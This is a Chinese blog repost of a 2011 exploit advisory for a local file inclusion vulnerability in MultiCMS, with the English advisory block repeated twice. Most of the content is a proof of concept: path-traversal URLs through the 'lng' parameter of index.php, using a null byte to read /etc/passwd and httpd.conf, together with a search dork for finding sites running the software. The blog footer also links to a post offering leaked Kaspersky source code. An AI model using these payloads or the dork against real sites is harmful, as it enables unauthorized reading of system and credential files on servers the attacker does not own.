MultiCMS是一款灵活的内容管理系统,可以帮你建立专业的网站。MultiCMS的index.php文件存在本地文件包含漏洞,可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcnà systém MultiCMS"
# Mail: defrontliner@whiteponny.com
[+]poc:
~~~~~~~~~
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
[+]Reference:
~~~~~~~~~
http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
[+]info:
~~~~~~~~~
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcnà systém MultiCMS"
# Mail: defrontliner@whiteponny.com
[+]poc:
~~~~~~~~~
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
[+]Reference:
~~~~~~~~~
http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/436/
赞(0)
赏
YesCK
卡巴斯基软件源代码泄露 博客提供卡巴斯基软件源代码下载
上一篇
2011年01月30日 18:16
EimsCms v5.0 XSS+CSRF=GetShell
下一篇
2011年02月01日 22:19
本文 暂无 评论